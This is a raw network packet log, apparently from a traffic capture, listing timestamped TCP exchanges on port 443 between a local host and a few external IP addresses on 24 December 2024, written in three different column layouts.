Dec 24, 2024 08:50:41.644289970 CET | 443 | 49703 | 172.67.199.72 | 192.168.2.7
Dec 24, 2024 08:50:41.644366026 CET | 49703 | 443 | 192.168.2.7 | 172.67.199.72
Dec 24, 2024 08:50:41.688395977 CET | 49703 | 443 | 192.168.2.7 | 172.67.199.72
Dec 24, 2024 08:50:41.688476086 CET | 443 | 49703 | 172.67.199.72 | 192.168.2.7
Dec 24, 2024 08:50:41.688863993 CET | 443 | 49703 | 172.67.199.72 | 192.168.2.7
Dec 24, 2024 08:50:41.716104031 CET | 49703 | 443 | 192.168.2.7 | 172.67.199.72
Dec 24, 2024 08:50:41.716298103 CET | 49703 | 443 | 192.168.2.7 | 172.67.199.72
Dec 24, 2024 08:50:41.716342926 CET | 443 | 49703 | 172.67.199.72 | 192.168.2.7
Dec 24, 2024 08:50:42.654747009 CET | 443 | 49703 | 172.67.199.72 | 192.168.2.7
Dec 24, 2024 08:50:42.654834986 CET | 443 | 49703 | 172.67.199.72 | 192.168.2.7
Dec 24, 2024 08:50:42.654932976 CET | 49703 | 443 | 192.168.2.7 | 172.67.199.72
Dec 24, 2024 08:50:42.658082008 CET | 49703 | 443 | 192.168.2.7 | 172.67.199.72
Dec 24, 2024 08:50:42.658113956 CET | 443 | 49703 | 172.67.199.72 | 192.168.2.7
Dec 24, 2024 08:50:42.798226118 CET | 49709 | 443 | 192.168.2.7 | 172.67.199.72
Dec 24, 2024 08:50:42.798289061 CET | 443 | 49709 | 172.67.199.72 | 192.168.2.7
Dec 24, 2024 08:50:42.798410892 CET | 49709 | 443 | 192.168.2.7 | 172.67.199.72
Dec 24, 2024 08:50:42.798762083 CET | 49709 | 443 | 192.168.2.7 | 172.67.199.72
Dec 24, 2024 08:50:42.798777103 CET | 443 | 49709 | 172.67.199.72 | 192.168.2.7
Dec 24, 2024 08:50:44.013976097 CET | 443 | 49709 | 172.67.199.72 | 192.168.2.7
Dec 24, 2024 08:50:44.014206886 CET | 49709 | 443 | 192.168.2.7 | 172.67.199.72
Dec 24, 2024 08:50:44.015568972 CET | 49709 | 443 | 192.168.2.7 | 172.67.199.72
Dec 24, 2024 08:50:44.015585899 CET | 443 | 49709 | 172.67.199.72 | 192.168.2.7
Dec 24, 2024 08:50:44.015836000 CET | 443 | 49709 | 172.67.199.72 | 192.168.2.7
Dec 24, 2024 08:50:44.017168045 CET | 49709 | 443 | 192.168.2.7 | 172.67.199.72
                                                                                                                                              Dec 24, 2024 08:50:44.017326117 CET49709443192.168.2.7172.67.199.72
                                                                                                                                              Dec 24, 2024 08:50:44.017364025 CET44349709172.67.199.72192.168.2.7
                                                                                                                                              Dec 24, 2024 08:50:44.017421007 CET49709443192.168.2.7172.67.199.72
                                                                                                                                              Dec 24, 2024 08:50:44.017427921 CET44349709172.67.199.72192.168.2.7
                                                                                                                                              Dec 24, 2024 08:50:44.975656986 CET44349709172.67.199.72192.168.2.7
                                                                                                                                              Dec 24, 2024 08:50:44.975809097 CET44349709172.67.199.72192.168.2.7
                                                                                                                                              Dec 24, 2024 08:50:44.975866079 CET49709443192.168.2.7172.67.199.72
                                                                                                                                              Dec 24, 2024 08:50:44.975975990 CET49709443192.168.2.7172.67.199.72
                                                                                                                                              Dec 24, 2024 08:50:44.975995064 CET44349709172.67.199.72192.168.2.7
                                                                                                                                              Dec 24, 2024 08:50:45.175242901 CET49715443192.168.2.7172.67.199.72
                                                                                                                                              Dec 24, 2024 08:50:45.175301075 CET44349715172.67.199.72192.168.2.7
                                                                                                                                              Dec 24, 2024 08:50:45.175487995 CET49715443192.168.2.7172.67.199.72
                                                                                                                                              Dec 24, 2024 08:50:45.175690889 CET49715443192.168.2.7172.67.199.72
                                                                                                                                              Dec 24, 2024 08:50:45.175705910 CET44349715172.67.199.72192.168.2.7
                                                                                                                                              Dec 24, 2024 08:50:46.387774944 CET44349715172.67.199.72192.168.2.7
                                                                                                                                              Dec 24, 2024 08:50:46.387851000 CET49715443192.168.2.7172.67.199.72
                                                                                                                                              Dec 24, 2024 08:50:46.407330036 CET49715443192.168.2.7172.67.199.72
                                                                                                                                              Dec 24, 2024 08:50:46.407346964 CET44349715172.67.199.72192.168.2.7
                                                                                                                                              Dec 24, 2024 08:50:46.407572985 CET44349715172.67.199.72192.168.2.7
                                                                                                                                              Dec 24, 2024 08:50:46.422565937 CET49715443192.168.2.7172.67.199.72
                                                                                                                                              Dec 24, 2024 08:50:46.422719002 CET49715443192.168.2.7172.67.199.72
                                                                                                                                              Dec 24, 2024 08:50:46.422754049 CET44349715172.67.199.72192.168.2.7
                                                                                                                                              Dec 24, 2024 08:50:46.422851086 CET49715443192.168.2.7172.67.199.72
                                                                                                                                              Dec 24, 2024 08:50:46.422862053 CET44349715172.67.199.72192.168.2.7
                                                                                                                                              Dec 24, 2024 08:50:47.386230946 CET44349715172.67.199.72192.168.2.7
                                                                                                                                              Dec 24, 2024 08:50:47.386298895 CET44349715172.67.199.72192.168.2.7
                                                                                                                                              Dec 24, 2024 08:50:47.386388063 CET49715443192.168.2.7172.67.199.72
                                                                                                                                              Dec 24, 2024 08:50:47.504398108 CET49715443192.168.2.7172.67.199.72
                                                                                                                                              Dec 24, 2024 08:50:47.504434109 CET44349715172.67.199.72192.168.2.7
                                                                                                                                              Dec 24, 2024 08:50:48.103935003 CET49721443192.168.2.7172.67.199.72
                                                                                                                                              Dec 24, 2024 08:50:48.103952885 CET44349721172.67.199.72192.168.2.7
                                                                                                                                              Dec 24, 2024 08:50:48.104038000 CET49721443192.168.2.7172.67.199.72
                                                                                                                                              Dec 24, 2024 08:50:48.104468107 CET49721443192.168.2.7172.67.199.72
                                                                                                                                              Dec 24, 2024 08:50:48.104479074 CET44349721172.67.199.72192.168.2.7
                                                                                                                                              Dec 24, 2024 08:50:49.316560030 CET44349721172.67.199.72192.168.2.7
                                                                                                                                              Dec 24, 2024 08:50:49.316663980 CET49721443192.168.2.7172.67.199.72
                                                                                                                                              Dec 24, 2024 08:50:49.318686962 CET49721443192.168.2.7172.67.199.72
                                                                                                                                              Dec 24, 2024 08:50:49.318695068 CET44349721172.67.199.72192.168.2.7
                                                                                                                                              Dec 24, 2024 08:50:49.318969011 CET44349721172.67.199.72192.168.2.7
                                                                                                                                              Dec 24, 2024 08:50:49.320533037 CET49721443192.168.2.7172.67.199.72
                                                                                                                                              Dec 24, 2024 08:50:49.320657969 CET49721443192.168.2.7172.67.199.72
                                                                                                                                              Dec 24, 2024 08:50:49.320664883 CET44349721172.67.199.72192.168.2.7
                                                                                                                                              Dec 24, 2024 08:50:50.066304922 CET44349721172.67.199.72192.168.2.7
                                                                                                                                              Dec 24, 2024 08:50:50.066399097 CET44349721172.67.199.72192.168.2.7
                                                                                                                                              Dec 24, 2024 08:50:50.066560030 CET49721443192.168.2.7172.67.199.72
                                                                                                                                              Dec 24, 2024 08:50:50.149723053 CET49721443192.168.2.7172.67.199.72
                                                                                                                                              Dec 24, 2024 08:50:50.149760008 CET44349721172.67.199.72192.168.2.7
                                                                                                                                              Dec 24, 2024 08:50:51.856590986 CET49735443192.168.2.7172.67.199.72
                                                                                                                                              Dec 24, 2024 08:50:51.856657982 CET44349735172.67.199.72192.168.2.7
                                                                                                                                              Dec 24, 2024 08:50:51.856731892 CET49735443192.168.2.7172.67.199.72
                                                                                                                                              Dec 24, 2024 08:50:51.857208967 CET49735443192.168.2.7172.67.199.72
                                                                                                                                              Dec 24, 2024 08:50:51.857225895 CET44349735172.67.199.72192.168.2.7
                                                                                                                                              Dec 24, 2024 08:50:53.076968908 CET44349735172.67.199.72192.168.2.7
                                                                                                                                              Dec 24, 2024 08:50:53.077105045 CET49735443192.168.2.7172.67.199.72
                                                                                                                                              Dec 24, 2024 08:50:53.078315973 CET49735443192.168.2.7172.67.199.72
                                                                                                                                              Dec 24, 2024 08:50:53.078330040 CET44349735172.67.199.72192.168.2.7
                                                                                                                                              Dec 24, 2024 08:50:53.078634024 CET44349735172.67.199.72192.168.2.7
                                                                                                                                              Dec 24, 2024 08:50:53.091243982 CET49735443192.168.2.7172.67.199.72
                                                                                                                                              Dec 24, 2024 08:50:53.092037916 CET49735443192.168.2.7172.67.199.72
                                                                                                                                              Dec 24, 2024 08:50:53.092103004 CET44349735172.67.199.72192.168.2.7
                                                                                                                                              Dec 24, 2024 08:50:53.092242956 CET49735443192.168.2.7172.67.199.72
                                                                                                                                              Dec 24, 2024 08:50:53.092298985 CET44349735172.67.199.72192.168.2.7
                                                                                                                                              Dec 24, 2024 08:50:53.092422009 CET49735443192.168.2.7172.67.199.72
                                                                                                                                              Dec 24, 2024 08:50:53.092689991 CET44349735172.67.199.72192.168.2.7
                                                                                                                                              Dec 24, 2024 08:50:53.093260050 CET49735443192.168.2.7172.67.199.72
                                                                                                                                              Dec 24, 2024 08:50:53.093281031 CET44349735172.67.199.72192.168.2.7
                                                                                                                                              Dec 24, 2024 08:50:53.093487024 CET49735443192.168.2.7172.67.199.72
                                                                                                                                              Dec 24, 2024 08:50:53.093542099 CET44349735172.67.199.72192.168.2.7
                                                                                                                                              Dec 24, 2024 08:50:53.093851089 CET49735443192.168.2.7172.67.199.72
                                                                                                                                              Dec 24, 2024 08:50:53.093882084 CET44349735172.67.199.72192.168.2.7
                                                                                                                                              Dec 24, 2024 08:50:53.093899012 CET49735443192.168.2.7172.67.199.72
                                                                                                                                              Dec 24, 2024 08:50:53.093961954 CET44349735172.67.199.72192.168.2.7
                                                                                                                                              Dec 24, 2024 08:50:53.094083071 CET49735443192.168.2.7172.67.199.72
                                                                                                                                              Dec 24, 2024 08:50:53.094119072 CET44349735172.67.199.72192.168.2.7
                                                                                                                                              Dec 24, 2024 08:50:53.094124079 CET49735443192.168.2.7172.67.199.72
                                                                                                                                              Dec 24, 2024 08:50:53.094141006 CET44349735172.67.199.72192.168.2.7
                                                                                                                                              Dec 24, 2024 08:50:53.094257116 CET49735443192.168.2.7172.67.199.72
                                                                                                                                              Dec 24, 2024 08:50:53.094273090 CET44349735172.67.199.72192.168.2.7
                                                                                                                                              Dec 24, 2024 08:50:53.094295025 CET49735443192.168.2.7172.67.199.72
                                                                                                                                              Dec 24, 2024 08:50:53.094304085 CET44349735172.67.199.72192.168.2.7
                                                                                                                                              Dec 24, 2024 08:50:53.094327927 CET49735443192.168.2.7172.67.199.72
                                                                                                                                              Dec 24, 2024 08:50:53.094347000 CET44349735172.67.199.72192.168.2.7
                                                                                                                                              Dec 24, 2024 08:50:53.094362020 CET49735443192.168.2.7172.67.199.72
                                                                                                                                              Dec 24, 2024 08:50:53.094464064 CET49735443192.168.2.7172.67.199.72
                                                                                                                                              Dec 24, 2024 08:50:53.094501019 CET49735443192.168.2.7172.67.199.72
                                                                                                                                              Dec 24, 2024 08:50:53.094512939 CET49735443192.168.2.7172.67.199.72
                                                                                                                                              Dec 24, 2024 08:50:53.135334969 CET44349735172.67.199.72192.168.2.7
                                                                                                                                              Dec 24, 2024 08:50:56.736167908 CET44349735172.67.199.72192.168.2.7
                                                                                                                                              Dec 24, 2024 08:50:56.736268997 CET44349735172.67.199.72192.168.2.7
                                                                                                                                              Dec 24, 2024 08:50:56.736339092 CET49735443192.168.2.7172.67.199.72
                                                                                                                                              Dec 24, 2024 08:50:56.736630917 CET49735443192.168.2.7172.67.199.72
                                                                                                                                              Dec 24, 2024 08:50:56.736649036 CET44349735172.67.199.72192.168.2.7
                                                                                                                                              Dec 24, 2024 08:50:56.748621941 CET49746443192.168.2.7172.67.199.72
                                                                                                                                              Dec 24, 2024 08:50:56.748661995 CET44349746172.67.199.72192.168.2.7
                                                                                                                                              Dec 24, 2024 08:50:56.748786926 CET49746443192.168.2.7172.67.199.72
                                                                                                                                              Dec 24, 2024 08:50:56.749094009 CET49746443192.168.2.7172.67.199.72
                                                                                                                                              Dec 24, 2024 08:50:56.749108076 CET44349746172.67.199.72192.168.2.7
                                                                                                                                              Dec 24, 2024 08:50:57.959934950 CET44349746172.67.199.72192.168.2.7
                                                                                                                                              Dec 24, 2024 08:50:57.960120916 CET49746443192.168.2.7172.67.199.72
                                                                                                                                              Dec 24, 2024 08:50:58.014520884 CET49746443192.168.2.7172.67.199.72
                                                                                                                                              Dec 24, 2024 08:50:58.014539957 CET44349746172.67.199.72192.168.2.7
                                                                                                                                              Dec 24, 2024 08:50:58.014913082 CET44349746172.67.199.72192.168.2.7
                                                                                                                                              Dec 24, 2024 08:50:58.020883083 CET49746443192.168.2.7172.67.199.72
                                                                                                                                              Dec 24, 2024 08:50:58.020883083 CET49746443192.168.2.7172.67.199.72
                                                                                                                                              Dec 24, 2024 08:50:58.020961046 CET44349746172.67.199.72192.168.2.7
                                                                                                                                              Dec 24, 2024 08:50:58.745227098 CET44349746172.67.199.72192.168.2.7
                                                                                                                                              Dec 24, 2024 08:50:58.745321989 CET44349746172.67.199.72192.168.2.7
                                                                                                                                              Dec 24, 2024 08:50:58.745405912 CET49746443192.168.2.7172.67.199.72
                                                                                                                                              Dec 24, 2024 08:50:58.773758888 CET49746443192.168.2.7172.67.199.72
                                                                                                                                              Dec 24, 2024 08:50:58.773758888 CET49746443192.168.2.7172.67.199.72
                                                                                                                                              Dec 24, 2024 08:50:58.773787975 CET44349746172.67.199.72192.168.2.7
                                                                                                                                              Dec 24, 2024 08:50:58.773801088 CET44349746172.67.199.72192.168.2.7
                                                                                                                                              Dec 24, 2024 08:50:58.916203976 CET49752443192.168.2.7185.166.143.48
                                                                                                                                              Dec 24, 2024 08:50:58.916253090 CET44349752185.166.143.48192.168.2.7
                                                                                                                                              Dec 24, 2024 08:50:58.916338921 CET49752443192.168.2.7185.166.143.48
                                                                                                                                              Dec 24, 2024 08:50:58.916954994 CET49752443192.168.2.7185.166.143.48
                                                                                                                                              Dec 24, 2024 08:50:58.916968107 CET44349752185.166.143.48192.168.2.7
                                                                                                                                              Dec 24, 2024 08:51:00.502542973 CET44349752185.166.143.48192.168.2.7
                                                                                                                                              Dec 24, 2024 08:51:00.502737999 CET49752443192.168.2.7185.166.143.48
                                                                                                                                              Dec 24, 2024 08:51:00.504642010 CET49752443192.168.2.7185.166.143.48
                                                                                                                                              Dec 24, 2024 08:51:00.504648924 CET44349752185.166.143.48192.168.2.7
                                                                                                                                              Dec 24, 2024 08:51:00.504926920 CET44349752185.166.143.48192.168.2.7
                                                                                                                                              Dec 24, 2024 08:51:00.506266117 CET49752443192.168.2.7185.166.143.48
                                                                                                                                              Dec 24, 2024 08:51:00.547326088 CET44349752185.166.143.48192.168.2.7
                                                                                                                                              Dec 24, 2024 08:51:01.187541962 CET44349752185.166.143.48192.168.2.7
                                                                                                                                              Dec 24, 2024 08:51:01.187592983 CET44349752185.166.143.48192.168.2.7
                                                                                                                                              Dec 24, 2024 08:51:01.187652111 CET44349752185.166.143.48192.168.2.7
                                                                                                                                              Dec 24, 2024 08:51:01.187736988 CET49752443192.168.2.7185.166.143.48
                                                                                                                                              Dec 24, 2024 08:51:01.187736988 CET49752443192.168.2.7185.166.143.48
                                                                                                                                              Dec 24, 2024 08:51:01.188782930 CET49752443192.168.2.7185.166.143.48
                                                                                                                                              Dec 24, 2024 08:51:01.188802004 CET44349752185.166.143.48192.168.2.7
                                                                                                                                              Dec 24, 2024 08:51:01.188837051 CET49752443192.168.2.7185.166.143.48
                                                                                                                                              Dec 24, 2024 08:51:01.188843966 CET44349752185.166.143.48192.168.2.7
Timestamp                             Source Port  Dest Port  Source IP      Dest IP
Dec 24, 2024 08:51:01.596565008 CET   49758        443        192.168.2.7    16.15.177.52
Dec 24, 2024 08:51:01.596606970 CET   443          49758      16.15.177.52   192.168.2.7
Dec 24, 2024 08:51:01.596678972 CET   49758        443        192.168.2.7    16.15.177.52
Dec 24, 2024 08:51:01.597862959 CET   49758        443        192.168.2.7    16.15.177.52
Dec 24, 2024 08:51:01.597872972 CET   443          49758      16.15.177.52   192.168.2.7
Dec 24, 2024 08:51:03.017751932 CET   443          49758      16.15.177.52   192.168.2.7
Dec 24, 2024 08:51:03.017870903 CET   49758        443        192.168.2.7    16.15.177.52
Dec 24, 2024 08:51:03.019697905 CET   49758        443        192.168.2.7    16.15.177.52
Dec 24, 2024 08:51:03.019706964 CET   443          49758      16.15.177.52   192.168.2.7
Dec 24, 2024 08:51:03.019974947 CET   443          49758      16.15.177.52   192.168.2.7
Dec 24, 2024 08:51:03.021186113 CET   49758        443        192.168.2.7    16.15.177.52
Dec 24, 2024 08:51:03.063323975 CET   443          49758      16.15.177.52   192.168.2.7
Dec 24, 2024 08:51:03.482603073 CET   443          49758      16.15.177.52   192.168.2.7
Dec 24, 2024 08:51:03.527333975 CET   49758        443        192.168.2.7    16.15.177.52
Dec 24, 2024 08:51:03.529933929 CET   443          49758      16.15.177.52   192.168.2.7
Dec 24, 2024 08:51:03.529967070 CET   443          49758      16.15.177.52   192.168.2.7
Dec 24, 2024 08:51:03.529995918 CET   443          49758      16.15.177.52   192.168.2.7
Dec 24, 2024 08:51:03.530036926 CET   49758        443        192.168.2.7    16.15.177.52
Dec 24, 2024 08:51:03.530050039 CET   443          49758      16.15.177.52   192.168.2.7
Dec 24, 2024 08:51:03.530105114 CET   443          49758      16.15.177.52   192.168.2.7
Dec 24, 2024 08:51:03.530118942 CET   49758        443        192.168.2.7    16.15.177.52
Dec 24, 2024 08:51:03.530118942 CET   49758        443        192.168.2.7    16.15.177.52
Dec 24, 2024 08:51:03.530124903 CET   443          49758      16.15.177.52   192.168.2.7
Dec 24, 2024 08:51:03.530165911 CET   49758        443        192.168.2.7    16.15.177.52
Dec 24, 2024 08:51:03.706020117 CET   443          49758      16.15.177.52   192.168.2.7
Dec 24, 2024 08:51:03.706069946 CET   443          49758      16.15.177.52   192.168.2.7
Dec 24, 2024 08:51:03.706140041 CET   49758        443        192.168.2.7    16.15.177.52
Dec 24, 2024 08:51:03.706155062 CET   443          49758      16.15.177.52   192.168.2.7
Dec 24, 2024 08:51:03.706202030 CET   49758        443        192.168.2.7    16.15.177.52
Dec 24, 2024 08:51:03.713032961 CET   443          49758      16.15.177.52   192.168.2.7
Dec 24, 2024 08:51:03.760226011 CET   443          49758      16.15.177.52   192.168.2.7
Dec 24, 2024 08:51:03.760246992 CET   443          49758      16.15.177.52   192.168.2.7
Dec 24, 2024 08:51:03.760329008 CET   49758        443        192.168.2.7    16.15.177.52
Dec 24, 2024 08:51:03.760339022 CET   443          49758      16.15.177.52   192.168.2.7
Dec 24, 2024 08:51:03.766257048 CET   443          49758      16.15.177.52   192.168.2.7
Dec 24, 2024 08:51:03.766315937 CET   49758        443        192.168.2.7    16.15.177.52
Dec 24, 2024 08:51:03.766324043 CET   443          49758      16.15.177.52   192.168.2.7
Dec 24, 2024 08:51:03.808507919 CET   49758        443        192.168.2.7    16.15.177.52
Dec 24, 2024 08:51:03.883635998 CET   443          49758      16.15.177.52   192.168.2.7
Dec 24, 2024 08:51:03.883646011 CET   443          49758      16.15.177.52   192.168.2.7
Dec 24, 2024 08:51:03.883693933 CET   443          49758      16.15.177.52   192.168.2.7
Dec 24, 2024 08:51:03.883730888 CET   49758        443        192.168.2.7    16.15.177.52
Dec 24, 2024 08:51:03.883735895 CET   443          49758      16.15.177.52   192.168.2.7
Dec 24, 2024 08:51:03.883754015 CET   443          49758      16.15.177.52   192.168.2.7
Dec 24, 2024 08:51:03.883773088 CET   49758        443        192.168.2.7    16.15.177.52
Dec 24, 2024 08:51:03.883790016 CET   49758        443        192.168.2.7    16.15.177.52
Dec 24, 2024 08:51:03.910552025 CET   443          49758      16.15.177.52   192.168.2.7
Dec 24, 2024 08:51:03.910573006 CET   443          49758      16.15.177.52   192.168.2.7
Dec 24, 2024 08:51:03.910651922 CET   49758        443        192.168.2.7    16.15.177.52
Dec 24, 2024 08:51:03.910665035 CET   443          49758      16.15.177.52   192.168.2.7
Dec 24, 2024 08:51:03.935926914 CET   443          49758      16.15.177.52   192.168.2.7
Dec 24, 2024 08:51:03.935944080 CET   443          49758      16.15.177.52   192.168.2.7
Dec 24, 2024 08:51:03.936023951 CET   49758        443        192.168.2.7    16.15.177.52
Dec 24, 2024 08:51:03.936033964 CET   443          49758      16.15.177.52   192.168.2.7
Dec 24, 2024 08:51:03.980390072 CET   49758        443        192.168.2.7    16.15.177.52
Dec 24, 2024 08:51:04.062263966 CET   443          49758      16.15.177.52   192.168.2.7
Dec 24, 2024 08:51:04.062274933 CET   443          49758      16.15.177.52   192.168.2.7
Dec 24, 2024 08:51:04.062321901 CET   443          49758      16.15.177.52   192.168.2.7
Dec 24, 2024 08:51:04.062331915 CET   443          49758      16.15.177.52   192.168.2.7
Dec 24, 2024 08:51:04.062387943 CET   49758        443        192.168.2.7    16.15.177.52
Dec 24, 2024 08:51:04.062402964 CET   443          49758      16.15.177.52   192.168.2.7
Dec 24, 2024 08:51:04.062448978 CET   49758        443        192.168.2.7    16.15.177.52
Dec 24, 2024 08:51:04.081465960 CET   443          49758      16.15.177.52   192.168.2.7
Dec 24, 2024 08:51:04.081475973 CET   443          49758      16.15.177.52   192.168.2.7
Dec 24, 2024 08:51:04.081511974 CET   443          49758      16.15.177.52   192.168.2.7
Dec 24, 2024 08:51:04.081564903 CET   49758        443        192.168.2.7    16.15.177.52
Dec 24, 2024 08:51:04.081574917 CET   443          49758      16.15.177.52   192.168.2.7
Dec 24, 2024 08:51:04.081583977 CET   443          49758      16.15.177.52   192.168.2.7
Dec 24, 2024 08:51:04.081607103 CET   49758        443        192.168.2.7    16.15.177.52
Dec 24, 2024 08:51:04.081630945 CET   49758        443        192.168.2.7    16.15.177.52
Dec 24, 2024 08:51:04.099576950 CET   443          49758      16.15.177.52   192.168.2.7
Dec 24, 2024 08:51:04.099594116 CET   443          49758      16.15.177.52   192.168.2.7
Dec 24, 2024 08:51:04.099658966 CET   49758        443        192.168.2.7    16.15.177.52
Dec 24, 2024 08:51:04.099668026 CET   443          49758      16.15.177.52   192.168.2.7
Dec 24, 2024 08:51:04.099822044 CET   49758        443        192.168.2.7    16.15.177.52
Dec 24, 2024 08:51:04.101978064 CET   443          49758      16.15.177.52   192.168.2.7
Dec 24, 2024 08:51:04.117450953 CET   443          49758      16.15.177.52   192.168.2.7
Dec 24, 2024 08:51:04.117469072 CET   443          49758      16.15.177.52   192.168.2.7
Dec 24, 2024 08:51:04.117660046 CET   49758        443        192.168.2.7    16.15.177.52
Dec 24, 2024 08:51:04.117669106 CET   443          49758      16.15.177.52   192.168.2.7
Dec 24, 2024 08:51:04.135560036 CET   443          49758      16.15.177.52   192.168.2.7
Dec 24, 2024 08:51:04.135607004 CET   443          49758      16.15.177.52   192.168.2.7
Dec 24, 2024 08:51:04.135776043 CET   49758        443        192.168.2.7    16.15.177.52
Dec 24, 2024 08:51:04.135785103 CET   443          49758      16.15.177.52   192.168.2.7
Dec 24, 2024 08:51:04.155148983 CET   443          49758      16.15.177.52   192.168.2.7
Dec 24, 2024 08:51:04.155175924 CET   443          49758      16.15.177.52   192.168.2.7
Dec 24, 2024 08:51:04.155247927 CET   49758        443        192.168.2.7    16.15.177.52
Dec 24, 2024 08:51:04.155256987 CET   443          49758      16.15.177.52   192.168.2.7
Dec 24, 2024 08:51:04.155272007 CET   49758        443        192.168.2.7    16.15.177.52
Dec 24, 2024 08:51:04.155322075 CET   49758        443        192.168.2.7    16.15.177.52
Dec 24, 2024 08:51:04.172640085 CET   443          49758      16.15.177.52   192.168.2.7
Dec 24, 2024 08:51:04.172672033 CET   443          49758      16.15.177.52   192.168.2.7
Dec 24, 2024 08:51:04.172795057 CET   49758        443        192.168.2.7    16.15.177.52
Dec 24, 2024 08:51:04.172795057 CET   49758        443        192.168.2.7    16.15.177.52
Dec 24, 2024 08:51:04.172805071 CET   443          49758      16.15.177.52   192.168.2.7
Dec 24, 2024 08:51:04.172991991 CET   49758        443        192.168.2.7    16.15.177.52
Dec 24, 2024 08:51:04.175158024 CET   443          49758      16.15.177.52   192.168.2.7
Dec 24, 2024 08:51:04.230549097 CET   49758        443        192.168.2.7    16.15.177.52
Dec 24, 2024 08:51:04.258069992 CET   443          49758      16.15.177.52   192.168.2.7
Dec 24, 2024 08:51:04.258088112 CET   443          49758      16.15.177.52   192.168.2.7
Dec 24, 2024 08:51:04.258151054 CET   443          49758      16.15.177.52   192.168.2.7
Dec 24, 2024 08:51:04.258172989 CET   49758        443        192.168.2.7    16.15.177.52
Dec 24, 2024 08:51:04.258194923 CET   443          49758      16.15.177.52   192.168.2.7
Dec 24, 2024 08:51:04.258227110 CET   49758        443        192.168.2.7    16.15.177.52
Dec 24, 2024 08:51:04.258246899 CET   49758        443        192.168.2.7    16.15.177.52
Dec 24, 2024 08:51:04.272234917 CET   443          49758      16.15.177.52   192.168.2.7
Dec 24, 2024 08:51:04.272255898 CET   443          49758      16.15.177.52   192.168.2.7
Dec 24, 2024 08:51:04.272332907 CET   49758        443        192.168.2.7    16.15.177.52
Dec 24, 2024 08:51:04.272340059 CET   443          49758      16.15.177.52   192.168.2.7
Dec 24, 2024 08:51:04.285295010 CET   443          49758      16.15.177.52   192.168.2.7
Dec 24, 2024 08:51:04.285347939 CET   443          49758      16.15.177.52   192.168.2.7
Dec 24, 2024 08:51:04.285367966 CET   49758        443        192.168.2.7    16.15.177.52
Dec 24, 2024 08:51:04.285376072 CET   443          49758      16.15.177.52   192.168.2.7
Dec 24, 2024 08:51:04.285403967 CET   49758        443        192.168.2.7    16.15.177.52
Dec 24, 2024 08:51:04.297513008 CET   443          49758      16.15.177.52   192.168.2.7
Dec 24, 2024 08:51:04.297565937 CET   443          49758      16.15.177.52   192.168.2.7
Dec 24, 2024 08:51:04.297606945 CET   49758        443        192.168.2.7    16.15.177.52
Dec 24, 2024 08:51:04.297617912 CET   443          49758      16.15.177.52   192.168.2.7
Dec 24, 2024 08:51:04.297631979 CET   49758        443        192.168.2.7    16.15.177.52
Dec 24, 2024 08:51:04.309943914 CET   443          49758      16.15.177.52   192.168.2.7
Dec 24, 2024 08:51:04.310002089 CET   443          49758      16.15.177.52   192.168.2.7
Dec 24, 2024 08:51:04.310024023 CET   49758        443        192.168.2.7    16.15.177.52
Dec 24, 2024 08:51:04.310035944 CET   443          49758      16.15.177.52   192.168.2.7
Dec 24, 2024 08:51:04.310055017 CET   49758        443        192.168.2.7    16.15.177.52
Dec 24, 2024 08:51:04.310074091 CET   49758        443        192.168.2.7    16.15.177.52
Dec 24, 2024 08:51:04.321530104 CET   443          49758      16.15.177.52   192.168.2.7
Dec 24, 2024 08:51:04.321578979 CET   443          49758      16.15.177.52   192.168.2.7
Dec 24, 2024 08:51:04.321619034 CET   49758        443        192.168.2.7    16.15.177.52
Dec 24, 2024 08:51:04.321628094 CET   443          49758      16.15.177.52   192.168.2.7
Dec 24, 2024 08:51:04.321644068 CET   49758        443        192.168.2.7    16.15.177.52
Dec 24, 2024 08:51:04.321662903 CET   49758        443        192.168.2.7    16.15.177.52
Dec 24, 2024 08:51:04.321669102 CET   443          49758      16.15.177.52   192.168.2.7
Dec 24, 2024 08:51:04.333184958 CET   443          49758      16.15.177.52   192.168.2.7
Dec 24, 2024 08:51:04.333213091 CET   443          49758      16.15.177.52   192.168.2.7
Dec 24, 2024 08:51:04.333259106 CET   49758        443        192.168.2.7    16.15.177.52
Dec 24, 2024 08:51:04.333266973 CET   443          49758      16.15.177.52   192.168.2.7
Dec 24, 2024 08:51:04.333292961 CET   49758        443        192.168.2.7    16.15.177.52
Dec 24, 2024 08:51:04.386647940 CET   49758        443        192.168.2.7    16.15.177.52
Dec 24, 2024 08:51:04.386656046 CET   443          49758      16.15.177.52   192.168.2.7
Dec 24, 2024 08:51:04.433459997 CET   49758        443        192.168.2.7    16.15.177.52
Dec 24, 2024 08:51:04.443487883 CET   443          49758      16.15.177.52   192.168.2.7
Dec 24, 2024 08:51:04.443505049 CET   443          49758      16.15.177.52   192.168.2.7
Dec 24, 2024 08:51:04.443557024 CET   443          49758      16.15.177.52   192.168.2.7
Dec 24, 2024 08:51:04.443568945 CET   49758        443        192.168.2.7    16.15.177.52
Dec 24, 2024 08:51:04.443588972 CET   443          49758      16.15.177.52   192.168.2.7
Dec 24, 2024 08:51:04.443620920 CET   49758        443        192.168.2.7    16.15.177.52
Dec 24, 2024 08:51:04.443624973 CET   443          49758      16.15.177.52   192.168.2.7
Dec 24, 2024 08:51:04.443662882 CET   49758        443        192.168.2.7    16.15.177.52
Dec 24, 2024 08:51:04.443675995 CET   443          49758      16.15.177.52   192.168.2.7
Dec 24, 2024 08:51:04.451951027 CET   443          49758      16.15.177.52   192.168.2.7
Dec 24, 2024 08:51:04.451972961 CET   443          49758      16.15.177.52   192.168.2.7
Dec 24, 2024 08:51:04.452011108 CET   49758        443        192.168.2.7    16.15.177.52
Dec 24, 2024 08:51:04.452019930 CET   443          49758      16.15.177.52   192.168.2.7
Dec 24, 2024 08:51:04.452044010 CET   49758        443        192.168.2.7    16.15.177.52
Dec 24, 2024 08:51:04.460047960 CET   443          49758      16.15.177.52   192.168.2.7
Dec 24, 2024 08:51:04.460072994 CET   443          49758      16.15.177.52   192.168.2.7
Dec 24, 2024 08:51:04.460105896 CET   49758        443        192.168.2.7    16.15.177.52
Dec 24, 2024 08:51:04.460113049 CET   443          49758      16.15.177.52   192.168.2.7
Dec 24, 2024 08:51:04.460139036 CET   49758        443        192.168.2.7    16.15.177.52
Dec 24, 2024 08:51:04.467606068 CET   443          49758      16.15.177.52   192.168.2.7
Dec 24, 2024 08:51:04.467669964 CET   443          49758      16.15.177.52   192.168.2.7
Dec 24, 2024 08:51:04.467683077 CET   49758        443        192.168.2.7    16.15.177.52
Dec 24, 2024 08:51:04.467691898 CET   443          49758      16.15.177.52   192.168.2.7
Dec 24, 2024 08:51:04.467724085 CET   49758        443        192.168.2.7    16.15.177.52
